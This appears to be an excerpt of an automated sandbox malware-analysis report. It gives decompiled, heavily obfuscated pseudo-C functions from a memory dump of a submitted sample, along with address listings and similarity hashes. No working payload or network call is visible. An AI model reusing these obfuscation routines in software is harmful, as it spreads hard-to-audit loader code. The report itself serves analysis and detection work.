                                                                                                                                                                                                                                                                            					_t955 =  *0x40dcf4; // 0x0
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) +  *(_t958 + 0x50) * 4)) = ( *( *((intOrPtr*)(_t958 + 0x7c)) + 0x6790) |  *( *((intOrPtr*)(_t958 + 0x7c)) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4)) /  *(_t955 +  *( *(_t958 + 0x70)) * 4) + ( *0x40dcb6 & 0x000000ff);
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x70) =  *(_t958 + 0x70) - 4;
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x54) =  *(_t958 + 0x54) + 1;
                                                                                                                                                                                                                                                                            					_t584 =  *0x40dce4; // 0x0
                                                                                                                                                                                                                                                                            					 *0x40dca8 = (_t584 % ( *0x40dcfc & 0x0000ffff) +  *(_t958 + 0x50)) /  *0x40dca8;
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x50) =  *(_t958 + 0x50) + 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t824 =  *0x40dce8; // 0x0
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x18) = _t824 + 0xdfa;
                                                                                                                                                                                                                                                                            				_t524 =  *0x40dce8; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dce8 = _t524 - 1;
                                                                                                                                                                                                                                                                            				 *(_t958 - 0x88) =  *( *((intOrPtr*)(_t958 + 0x78)) +  *(_t958 + 0x48) * 2) & 0x1c64;
                                                                                                                                                                                                                                                                            				_t528 =  *0x40dce8; // 0x0
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				 *(_t958 - 0x84) = _t528 % 0x1c97;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 - 0x80)) = 0x11d6;
                                                                                                                                                                                                                                                                            				_t828 =  *0x40dccc; // 0x0
                                                                                                                                                                                                                                                                            				_t530 =  *0x40dcec; // 0x0
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 - 0x7c)) =  *((intOrPtr*)(_t530 + _t828 * 4));
                                                                                                                                                                                                                                                                            				 *(_t958 - 0x78) =  *( *(_t958 + 0x44) + ( *0x40dcc4 & 0x0000ffff) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 - 0x74)) = 0x3cb -  *((intOrPtr*)( *(_t958 + 0x4c) + ( *( *(_t958 + 0x3c)) & 0x000000ff) * 4));
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x14) =  *( *((intOrPtr*)(_t958 + 0xc)) + ( *0x40dcc4 & 0x0000ffff)) & 0x000000ff;
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x1c) = ( *( *((intOrPtr*)(_t958 - 8)) +  *0x40dcb0) & 0x000000ff) + 0x324;
                                                                                                                                                                                                                                                                            				 *(_t958 - 0x70) =  *(_t958 + 0x68);
                                                                                                                                                                                                                                                                            				 *((char*)( *(_t958 + 0x54) +  *( *(_t958 + 0x4c)))) = E00385190( *(_t958 + 0x18) & 0x0000ffff,  *(_t958 - 0x88),  *(_t958 - 0x84),  *((intOrPtr*)(_t958 - 0x80)),  *((intOrPtr*)(_t958 - 0x7c)),  *(_t958 - 0x78),  *((intOrPtr*)(_t958 - 0x74)),  *(_t958 + 0x14) & 0x0000ffff,  *(_t958 + 0x1c) & 0x0000ffff,  *(_t958 - 0x70));
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)( *(_t958 + 0x38) +  *( *(_t958 + 0x70)) * 4)) =  *((intOrPtr*)( *(_t958 + 0x38) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 3 * 4));
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)( *(_t958 + 0x4c) + 0x84 +  *( *(_t958 + 0x70)) * 4)) = ( *0x40dcc4 & 0x0000ffff) -  *((intOrPtr*)( *(_t958 + 0x4c) + 0x84 +  *( *(_t958 + 0x70)) * 4));
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x70) =  &(( *(_t958 + 0x70))[1]);
                                                                                                                                                                                                                                                                            				_t848 =  *0x40dcf0; // 0x0
                                                                                                                                                                                                                                                                            				 *(_t958 - 0x8c) =  *( *((intOrPtr*)(_t958 + 0x34)) + ( *( *(_t958 + 0x70)) << 2) * 2) & 0x0000ffff &  *(_t848 + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4);
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x70) =  &(( *(_t958 + 0x70))[1]);
                                                                                                                                                                                                                                                                            				return  *(_t958 - 0x8c);
                                                                                                                                                                                                                                                                            			}







































                                                                                                                                                                                                                                                                            0x00386821
                                                                                                                                                                                                                                                                            0x00386825
                                                                                                                                                                                                                                                                            0x00386837
                                                                                                                                                                                                                                                                            0x00386847
                                                                                                                                                                                                                                                                            0x0038684a
                                                                                                                                                                                                                                                                            0x00386851
                                                                                                                                                                                                                                                                            0x0038685d
                                                                                                                                                                                                                                                                            0x00386860
                                                                                                                                                                                                                                                                            0x0038686d
                                                                                                                                                                                                                                                                            0x0038687d
                                                                                                                                                                                                                                                                            0x00386885
                                                                                                                                                                                                                                                                            0x00386892
                                                                                                                                                                                                                                                                            0x003868a3
                                                                                                                                                                                                                                                                            0x003868aa
                                                                                                                                                                                                                                                                            0x003868b9
                                                                                                                                                                                                                                                                            0x003868d5
                                                                                                                                                                                                                                                                            0x003868d8
                                                                                                                                                                                                                                                                            0x003868ea
                                                                                                                                                                                                                                                                            0x003868fc
                                                                                                                                                                                                                                                                            0x00386915
                                                                                                                                                                                                                                                                            0x0038692e
                                                                                                                                                                                                                                                                            0x00386931
                                                                                                                                                                                                                                                                            0x0038693c
                                                                                                                                                                                                                                                                            0x00386950
                                                                                                                                                                                                                                                                            0x00386964
                                                                                                                                                                                                                                                                            0x0038696a
                                                                                                                                                                                                                                                                            0x00386986
                                                                                                                                                                                                                                                                            0x0038699a
                                                                                                                                                                                                                                                                            0x003869a7
                                                                                                                                                                                                                                                                            0x003869b5
                                                                                                                                                                                                                                                                            0x003869d5
                                                                                                                                                                                                                                                                            0x003869df
                                                                                                                                                                                                                                                                            0x003869e5
                                                                                                                                                                                                                                                                            0x00386a03
                                                                                                                                                                                                                                                                            0x00386a1e
                                                                                                                                                                                                                                                                            0x00386a26
                                                                                                                                                                                                                                                                            0x00386a35
                                                                                                                                                                                                                                                                            0x00386a38
                                                                                                                                                                                                                                                                            0x00386a41
                                                                                                                                                                                                                                                                            0x00386a4c
                                                                                                                                                                                                                                                                            0x00386a55
                                                                                                                                                                                                                                                                            0x00386a6b
                                                                                                                                                                                                                                                                            0x00386a71
                                                                                                                                                                                                                                                                            0x00386a80
                                                                                                                                                                                                                                                                            0x00386a8e
                                                                                                                                                                                                                                                                            0x00386a97
                                                                                                                                                                                                                                                                            0x00386a9d
                                                                                                                                                                                                                                                                            0x00386aa9
                                                                                                                                                                                                                                                                            0x00386ab1
                                                                                                                                                                                                                                                                            0x00386abe
                                                                                                                                                                                                                                                                            0x00386ad3
                                                                                                                                                                                                                                                                            0x00386ade
                                                                                                                                                                                                                                                                            0x00386aec
                                                                                                                                                                                                                                                                            0x00386af3
                                                                                                                                                                                                                                                                            0x00386b21
                                                                                                                                                                                                                                                                            0x00386b29
                                                                                                                                                                                                                                                                            0x00386b32
                                                                                                                                                                                                                                                                            0x00386b35
                                                                                                                                                                                                                                                                            0x00386b3f
                                                                                                                                                                                                                                                                            0x00386b5b
                                                                                                                                                                                                                                                                            0x00386b6b
                                                                                                                                                                                                                                                                            0x00386b75
                                                                                                                                                                                                                                                                            0x00386b7e
                                                                                                                                                                                                                                                                            0x00386b81
                                                                                                                                                                                                                                                                            0x00386b86
                                                                                                                                                                                                                                                                            0x00386b8a
                                                                                                                                                                                                                                                                            0x00386b99
                                                                                                                                                                                                                                                                            0x00386ba2
                                                                                                                                                                                                                                                                            0x00386ba8
                                                                                                                                                                                                                                                                            0x00386bac
                                                                                                                                                                                                                                                                            0x00386bb0
                                                                                                                                                                                                                                                                            0x00386bb4
                                                                                                                                                                                                                                                                            0x00386bb5
                                                                                                                                                                                                                                                                            0x00386bba
                                                                                                                                                                                                                                                                            0x00386bbd
                                                                                                                                                                                                                                                                            0x00386be1
                                                                                                                                                                                                                                                                            0x00386beb
                                                                                                                                                                                                                                                                            0x00386bf3
                                                                                                                                                                                                                                                                            0x00386c19
                                                                                                                                                                                                                                                                            0x00386c3b
                                                                                                                                                                                                                                                                            0x00386c54
                                                                                                                                                                                                                                                                            0x00386c64
                                                                                                                                                                                                                                                                            0x00386c70
                                                                                                                                                                                                                                                                            0x00386c8a
                                                                                                                                                                                                                                                                            0x00386c93
                                                                                                                                                                                                                                                                            0x00386c96
                                                                                                                                                                                                                                                                            0x00386c9c
                                                                                                                                                                                                                                                                            0x00386cb0
                                                                                                                                                                                                                                                                            0x00386cb3
                                                                                                                                                                                                                                                                            0x00386cbc
                                                                                                                                                                                                                                                                            0x00386cc9
                                                                                                                                                                                                                                                                            0x00386cd8
                                                                                                                                                                                                                                                                            0x00386cf3
                                                                                                                                                                                                                                                                            0x00386cf8
                                                                                                                                                                                                                                                                            0x00386d03
                                                                                                                                                                                                                                                                            0x00386d2f
                                                                                                                                                                                                                                                                            0x00386d3b
                                                                                                                                                                                                                                                                            0x00386d3b
                                                                                                                                                                                                                                                                            0x00386c19
                                                                                                                                                                                                                                                                            0x003869b2
                                                                                                                                                                                                                                                                            0x003869b2
                                                                                                                                                                                                                                                                            0x00386d4f
                                                                                                                                                                                                                                                                            0x00386d5d
                                                                                                                                                                                                                                                                            0x00386d71
                                                                                                                                                                                                                                                                            0x00386d7c
                                                                                                                                                                                                                                                                            0x00386d8d
                                                                                                                                                                                                                                                                            0x00386da1
                                                                                                                                                                                                                                                                            0x00386daf
                                                                                                                                                                                                                                                                            0x00386db2
                                                                                                                                                                                                                                                                            0x00386dbc
                                                                                                                                                                                                                                                                            0x00386ddd
                                                                                                                                                                                                                                                                            0x00386df0
                                                                                                                                                                                                                                                                            0x00386df3
                                                                                                                                                                                                                                                                            0x00386dfc
                                                                                                                                                                                                                                                                            0x00386e1b
                                                                                                                                                                                                                                                                            0x00386e38
                                                                                                                                                                                                                                                                            0x00386e3d
                                                                                                                                                                                                                                                                            0x00386e40
                                                                                                                                                                                                                                                                            0x00386e55
                                                                                                                                                                                                                                                                            0x00386e68
                                                                                                                                                                                                                                                                            0x00386e6e
                                                                                                                                                                                                                                                                            0x00386e77
                                                                                                                                                                                                                                                                            0x00386ea8
                                                                                                                                                                                                                                                                            0x00386ecd
                                                                                                                                                                                                                                                                            0x00386ee7
                                                                                                                                                                                                                                                                            0x00386ef0
                                                                                                                                                                                                                                                                            0x00386ef9
                                                                                                                                                                                                                                                                            0x00386f03
                                                                                                                                                                                                                                                                            0x00386f19
                                                                                                                                                                                                                                                                            0x00386d5a
                                                                                                                                                                                                                                                                            0x00386d5a
                                                                                                                                                                                                                                                                            0x00386f23
                                                                                                                                                                                                                                                                            0x00386f2f
                                                                                                                                                                                                                                                                            0x00386f33
                                                                                                                                                                                                                                                                            0x00386f3b
                                                                                                                                                                                                                                                                            0x00386f4f
                                                                                                                                                                                                                                                                            0x00386f55
                                                                                                                                                                                                                                                                            0x00386f5a
                                                                                                                                                                                                                                                                            0x00386f62
                                                                                                                                                                                                                                                                            0x00386f68
                                                                                                                                                                                                                                                                            0x00386f6f
                                                                                                                                                                                                                                                                            0x00386f75
                                                                                                                                                                                                                                                                            0x00386f7d
                                                                                                                                                                                                                                                                            0x00386f8e
                                                                                                                                                                                                                                                                            0x00386fa2
                                                                                                                                                                                                                                                                            0x00386fb4
                                                                                                                                                                                                                                                                            0x00386fca
                                                                                                                                                                                                                                                                            0x00386fd1
                                                                                                                                                                                                                                                                            0x00387015
                                                                                                                                                                                                                                                                            0x0038702f
                                                                                                                                                                                                                                                                            0x00387050
                                                                                                                                                                                                                                                                            0x0038705d
                                                                                                                                                                                                                                                                            0x00387075
                                                                                                                                                                                                                                                                            0x0038707e
                                                                                                                                                                                                                                                                            0x0038708a
                                                                                                                                                                                                                                                                            0x0038709a

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 74821829a8eb05c5a51669cd041bd9a7b9f99d2ce2574c6525119c9ca3e38b2c
                                                                                                                                                                                                                                                                            • Instruction ID: 18e613e9435b129dd15bf9b07ae50c8de37dcd9d7d09866f0f15018a29b3adb6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74821829a8eb05c5a51669cd041bd9a7b9f99d2ce2574c6525119c9ca3e38b2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A621374A04248CFDB18CFA8D9909A9BBF2FF89300B208159FD559B3A5DB34E956CB44
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                                                                            			E003744B0() {
                                                                                                                                                                                                                                                                            				signed int _t333;
                                                                                                                                                                                                                                                                            				signed int _t335;
                                                                                                                                                                                                                                                                            				signed int _t339;
                                                                                                                                                                                                                                                                            				signed char _t351;
                                                                                                                                                                                                                                                                            				signed int _t376;
                                                                                                                                                                                                                                                                            				signed int _t380;
                                                                                                                                                                                                                                                                            				intOrPtr _t389;
                                                                                                                                                                                                                                                                            				signed int _t390;
                                                                                                                                                                                                                                                                            				signed int _t397;
                                                                                                                                                                                                                                                                            				intOrPtr _t411;
                                                                                                                                                                                                                                                                            				intOrPtr _t422;
                                                                                                                                                                                                                                                                            				signed int _t423;
                                                                                                                                                                                                                                                                            				signed int _t433;
                                                                                                                                                                                                                                                                            				signed int _t442;
                                                                                                                                                                                                                                                                            				intOrPtr _t444;
                                                                                                                                                                                                                                                                            				short _t457;
                                                                                                                                                                                                                                                                            				signed short _t472;
                                                                                                                                                                                                                                                                            				signed int _t475;
                                                                                                                                                                                                                                                                            				intOrPtr _t492;
                                                                                                                                                                                                                                                                            				signed int _t500;
                                                                                                                                                                                                                                                                            				signed int _t508;
                                                                                                                                                                                                                                                                            				intOrPtr _t511;
                                                                                                                                                                                                                                                                            				intOrPtr _t520;
                                                                                                                                                                                                                                                                            				signed int _t523;
                                                                                                                                                                                                                                                                            				intOrPtr _t528;
                                                                                                                                                                                                                                                                            				signed int _t540;
                                                                                                                                                                                                                                                                            				signed int _t546;
                                                                                                                                                                                                                                                                            				intOrPtr _t573;
                                                                                                                                                                                                                                                                            				signed int _t575;
                                                                                                                                                                                                                                                                            				intOrPtr _t579;
                                                                                                                                                                                                                                                                            				intOrPtr _t592;
                                                                                                                                                                                                                                                                            				signed int _t617;
                                                                                                                                                                                                                                                                            				signed int* _t633;
                                                                                                                                                                                                                                                                            				void* _t635;
                                                                                                                                                                                                                                                                            				void* _t636;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t633 = _t635 - 0x68;
                                                                                                                                                                                                                                                                            				_t636 = _t635 - 0x9c;
                                                                                                                                                                                                                                                                            				_t633[0x1f] = _t633[0x1f] + 1;
                                                                                                                                                                                                                                                                            				_t633[0x10] = _t633[0x1f] + _t633[0x1f];
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t633 - 0x1c)) = 0xe5f;
                                                                                                                                                                                                                                                                            				_t633[0x13] = 0x1c27;
                                                                                                                                                                                                                                                                            				_t633[8] = _t633[0x1f] - 0x1b62;
                                                                                                                                                                                                                                                                            				_t333 =  *0x40dcb0; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dcb0 = _t333 + 1;
                                                                                                                                                                                                                                                                            				_t433 =  *0x40dcb0; // 0x0
                                                                                                                                                                                                                                                                            				_t520 =  *0x40dcec; // 0x0
                                                                                                                                                                                                                                                                            				_t335 =  *0x40dcb0; // 0x0
                                                                                                                                                                                                                                                                            				_t633[0x12] = _t335 |  *(_t520 + _t433 * 4);
                                                                                                                                                                                                                                                                            				_t633[0xe] = _t633[0x1f] % 0x1244;
                                                                                                                                                                                                                                                                            				_t523 =  *0x40dd00; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dd00 = _t523 + 1;
                                                                                                                                                                                                                                                                            				_t339 =  *0x40dd00; // 0x0
                                                                                                                                                                                                                                                                            				 *(_t633 - 0x20) =  *(_t633[0x1d] + 0x5c + _t633[0x1f] * 4) &  *(_t633[0x1e] + (_t339 << 1) * 4);
                                                                                                                                                                                                                                                                            				_t633[0x1f] = _t633[0x1f] - 1;
                                                                                                                                                                                                                                                                            				_t528 =  *0x40dcdc; // 0x0
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t633 - 0x24)) =  *((intOrPtr*)(_t528 + 0x1248)) - 0x18ed;
                                                                                                                                                                                                                                                                            				 *(_t633 - 0x28) =  *0x40dcb6 & 0x000000ff ^  *(_t633[0x1e] + 0x1178);
                                                                                                                                                                                                                                                                            				_t633[0xd] =  *(_t633[0x1e] + (_t633[0x1f] << 2) * 4);
                                                                                                                                                                                                                                                                            				_t633[0x1f] = _t633[0x1f] + 1;
                                                                                                                                                                                                                                                                            				_t442 =  *0x40dd08; // 0x0
                                                                                                                                                                                                                                                                            				_t633[0x17] = _t442 | M0040DCC8;
                                                                                                                                                                                                                                                                            				_t633[0x19] = ( *0x40dcb6 & 0x000000ff) - 0x16b8;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t633 - 0x2c)) = 0x92;
                                                                                                                                                                                                                                                                            				_t444 =  *0x40dcac; // 0x0
                                                                                                                                                                                                                                                                            				_t633[0x18] =  *(_t444 + 4 + (( *0x40dcb6 & 0x000000ff) << 2) * 4) * 0xf7b;
                                                                                                                                                                                                                                                                            				_t351 =  *0x40dcb6; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dcb6 = _t351 + 1;
                                                                                                                                                                                                                                                                            				_t633[0xc] = 0x64f -  *0x40dcd8;
                                                                                                                                                                                                                                                                            				_t633[0x14] =  *(_t633[0x1d] + _t633[0x1f] * 4) | 0x00001351;
                                                                                                                                                                                                                                                                            				_t633[0xf] = (_t633[0x1c] + _t633[0x1f])[2] & 0x000000ff;
                                                                                                                                                                                                                                                                            				_t633[0x1f] = _t633[0x1f] - 1;
                                                                                                                                                                                                                                                                            				 *(_t633 - 0x30) = 0x6a6 /  *(_t633[0x1d] + (_t633[0x1f] << 2) * 4);
                                                                                                                                                                                                                                                                            				_t540 =  *0x40dccc; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dccc = _t540 + 1;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t633 - 0x34)) = _t633[0x1f] +  *0x40dccc;
                                                                                                                                                                                                                                                                            				_t633[0x15] = _t633[0x1f] +  *0x40dd00;
                                                                                                                                                                                                                                                                            				_t633[0x16] =  *(_t633[0x1c] + _t633[0x1f]) & 0x000000ff;
                                                                                                                                                                                                                                                                            				while(_t633[0x16] >= (_t633[0x19] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                            					_t633[9] =  *(_t633[0x14] + 0x66f0);
                                                                                                                                                                                                                                                                            					_t633[0x19] = _t633[0x19] - 1;
                                                                                                                                                                                                                                                                            					_t633[0xa] = ( *(_t633[0x17] + 0x2ea6) & 0x0000ffff) -  *((intOrPtr*)(_t633[0x1e] + (_t633[0x19] & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                                            					_t633[0xb] = _t633[0x16] + _t633[0x16];
                                                                                                                                                                                                                                                                            					_t397 = _t633[0xb];
                                                                                                                                                                                                                                                                            					_push(_t397);
                                                                                                                                                                                                                                                                            					_push(_t633[0xa]);
                                                                                                                                                                                                                                                                            					_push(_t633[9]);
                                                                                                                                                                                                                                                                            					L00388D20();
                                                                                                                                                                                                                                                                            					_t636 = _t636 + 0xc;
                                                                                                                                                                                                                                                                            					 *0x40dcb8 = _t397;
                                                                                                                                                                                                                                                                            					_t633[0x10] = (( *0x40dcc4 & 0x0000ffff) * 0x00000588 |  *(_t633[8] + _t633[0x1f] * 4)) / _t633[0x10];
                                                                                                                                                                                                                                                                            					_t633[7] =  *(_t633[0x13] + 4 + _t633[0x1f] * 3 * 4);
                                                                                                                                                                                                                                                                            					_t633[6] = _t633[0x1f];
                                                                                                                                                                                                                                                                            					_t633[0x1f] = _t633[0x1f] + 1;
                                                                                                                                                                                                                                                                            					if(_t633[7] < _t633[6]) {
                                                                                                                                                                                                                                                                            						_t592 =  *0x40dcf4; // 0x0
                                                                                                                                                                                                                                                                            						_t492 =  *0x40dcbc; // 0x0
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t633[0x13] + ( *(_t633[0x17]) & 0x0000ffff) * 4)) =  *(_t592 + _t633[0x1f] * 4) /  *(_t633[0x1d] + 4) -  *((intOrPtr*)(_t492 + ( *(_t633[0x17]) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t633[0x13] + ( *(_t633[0x17]) & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                                            						_t633[0x17] = _t633[0x17] + 2;
                                                                                                                                                                                                                                                                            						_t633[0x1f] = _t633[0x1f] + 1;
                                                                                                                                                                                                                                                                            						_t633[0x19] = _t633[0x19] + 1;
                                                                                                                                                                                                                                                                            						_t411 =  *0x40dcac; // 0x0
                                                                                                                                                                                                                                                                            						_t633[0x15] =  *((intOrPtr*)(_t411 + ((_t633[0x19] & 0x0000ffff) << 2) * 4));
                                                                                                                                                                                                                                                                            						_t633[2] = ( *(_t633[0xc] + (( *(_t633[0x17]) & 0x0000ffff) << 2) * 2) & 0x0000ffff) * (_t633[0x18] & 0x000000ff);
                                                                                                                                                                                                                                                                            						_t500 =  *0x40dce4; // 0x0
                                                                                                                                                                                                                                                                            						_t633[3] = _t500;
                                                                                                                                                                                                                                                                            						_t633[4] =  *(_t633[0x14] + ( *(_t633[0x17]) & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                                            						_t633[5] =  *(_t633[0xd] + 0x18 + _t633[0x16] * 4);
                                                                                                                                                                                                                                                                            						 *(_t633[0x14]) =  *(_t633[0x14]) - 1;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t633[0xf] +  *(_t633[0x14]) * 4)) = E00384F70(_t633[0x15] & 0x000000ff, _t633[2], _t633[3], _t633[4], _t633[5]);
                                                                                                                                                                                                                                                                            						 *(_t633 - 4) = _t633[0x15] & 0x000000ff;
                                                                                                                                                                                                                                                                            						_t508 =  *0x40dccc; // 0x0
                                                                                                                                                                                                                                                                            						_t422 =  *0x40dcf0; // 0x0
                                                                                                                                                                                                                                                                            						 *_t633 =  *0x40dcc4 & 0x0000ffff ^  *(_t422 + _t508 * 4);
                                                                                                                                                                                                                                                                            						_t633[1] = _t633[0x1f];
                                                                                                                                                                                                                                                                            						_push(_t633[1]);
                                                                                                                                                                                                                                                                            						_t423 =  *_t633;
                                                                                                                                                                                                                                                                            						_push(_t423);
                                                                                                                                                                                                                                                                            						_push( *(_t633 - 4));
                                                                                                                                                                                                                                                                            						L00388D20();
                                                                                                                                                                                                                                                                            						_t636 = _t636 + 0x20;
                                                                                                                                                                                                                                                                            						_t511 =  *0x40dcac; // 0x0
                                                                                                                                                                                                                                                                            						 *(_t511 + 0x10 + _t633[0x16] * 4) = _t423;
                                                                                                                                                                                                                                                                            						_t617 =  *0x40dcb0; // 0x0
                                                                                                                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                                                                                                                            						 *0x40dccc = (( *0x40dcb4 & 0x000000ff) - ( *(_t633[0x1c] + _t617 * 4) & 0x000000ff)) %  *(_t633[0xf] + (_t633[0x16] << 2) * 4) + 0x0000004a |  *0x40dccc;
                                                                                                                                                                                                                                                                            						 *((char*)(_t633[0x1c] +  *0x40dce4 + 5)) = _t633[0x1f] % 0x1886;
                                                                                                                                                                                                                                                                            						_t633[0x1f] = _t633[0x1f] + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t633[0x16] = _t633[0x16] + 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t546 =  *0x40dcb0; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dcd0 = (_t546 ^  *(_t633[0x13] + ( *(_t633[0x14]) << 1) * 4)) -  *(_t633[0x1d] + _t633[0x1f] * 4) ^ _t633[0x12] |  *0x40dcd0;
                                                                                                                                                                                                                                                                            				_t457 =  *0x40dd04; // 0x0
                                                                                                                                                                                                                                                                            				 *((short*)(_t633[0x17] + 0x2c + ( *0x40dcc4 & 0x0000ffff) * 2)) = _t457;
                                                                                                                                                                                                                                                                            				 *(_t633[0x1e] + _t633[0x1f] * 4) = 0xb04 /  *(_t633[0x1d] + 0x1c + _t633[0x1f] * 4) /  *(_t633[0x13] + 0x18 + _t633[0x1f] * 4) % 0xabc /  *(_t633[0x1e] + _t633[0x1f] * 4);
                                                                                                                                                                                                                                                                            				 *(_t633[0x17]) =  *(_t633[0x17]) - 1;
                                                                                                                                                                                                                                                                            				 *(_t633[0xe] + ( *(_t633[0x17]) & 0x0000ffff) * 2) = 0x1365 - _t633[0x12] + ( *(_t633[0xe] + ( *(_t633[0x17]) & 0x0000ffff) * 2) & 0x0000ffff);
                                                                                                                                                                                                                                                                            				_t376 =  *0x40dd08; // 0x0
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				 *(_t633 - 0x18) = _t376 / ( *0x40dcc4 & 0x0000ffff);
                                                                                                                                                                                                                                                                            				_t633[0x12] = _t633[0x12] - 1;
                                                                                                                                                                                                                                                                            				 *(_t633 - 0x14) =  *(_t633[0xd] + ( *0x40dcb6 & 0x000000ff) * 4) ^ _t633[0x12];
                                                                                                                                                                                                                                                                            				_t380 = M0040DCC8; // 0x0
                                                                                                                                                                                                                                                                            				 *(_t633 - 0x10) = _t380 *  *(_t633[0x1e] + 0x20 + ( *(_t633[0x17]) & 0x0000ffff) * 4);
                                                                                                                                                                                                                                                                            				 *(_t633 - 0xc) = _t633[0x19] & 0x0000ffff;
                                                                                                                                                                                                                                                                            				_t633[0x19] = _t633[0x19] + 1;
                                                                                                                                                                                                                                                                            				_t573 =  *0x40dcbc; // 0x0
                                                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                                                            				 *(_t633 - 8) =  *(_t573 + _t633[0x1f] * 4) / (_t633[0x18] & 0x000000ff);
                                                                                                                                                                                                                                                                            				_t633[0x18] = _t633[0x18] + 1;
                                                                                                                                                                                                                                                                            				_t472 =  *0x40dca8; // 0x0
                                                                                                                                                                                                                                                                            				_t633[0x11] = _t472;
                                                                                                                                                                                                                                                                            				_t575 =  *0x40dd08; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dd08 = _t575 - 1;
                                                                                                                                                                                                                                                                            				_t389 = E003865C0( *(_t633 - 0x18),  *(_t633 - 0x14),  *(_t633 - 0x10),  *(_t633 - 0xc),  *(_t633 - 8), _t633[0x11] & 0x0000ffff);
                                                                                                                                                                                                                                                                            				_t475 =  *0x40dd08; // 0x0
                                                                                                                                                                                                                                                                            				_t579 =  *0x40dcbc; // 0x0
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t579 + 0x24 + _t475 * 4)) = _t389;
                                                                                                                                                                                                                                                                            				_t390 =  *0x40dcd8; // 0x0
                                                                                                                                                                                                                                                                            				return  *(_t633[0xc] + (_t390 << 1) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                            			}






































                                                                                                                                                                                                                                                                            0x003744b1
                                                                                                                                                                                                                                                                            0x003744b5
                                                                                                                                                                                                                                                                            0x003744c2
                                                                                                                                                                                                                                                                            0x003744cb
                                                                                                                                                                                                                                                                            0x003744ce
                                                                                                                                                                                                                                                                            0x003744d5
                                                                                                                                                                                                                                                                            0x003744e5
                                                                                                                                                                                                                                                                            0x003744e8
                                                                                                                                                                                                                                                                            0x003744f0
                                                                                                                                                                                                                                                                            0x003744f5
                                                                                                                                                                                                                                                                            0x003744fb
                                                                                                                                                                                                                                                                            0x00374501
                                                                                                                                                                                                                                                                            0x00374509
                                                                                                                                                                                                                                                                            0x00374518
                                                                                                                                                                                                                                                                            0x0037451b
                                                                                                                                                                                                                                                                            0x00374524
                                                                                                                                                                                                                                                                            0x0037452a
                                                                                                                                                                                                                                                                            0x00374541
                                                                                                                                                                                                                                                                            0x0037454a
                                                                                                                                                                                                                                                                            0x00374558
                                                                                                                                                                                                                                                                            0x00374566
                                                                                                                                                                                                                                                                            0x00374581
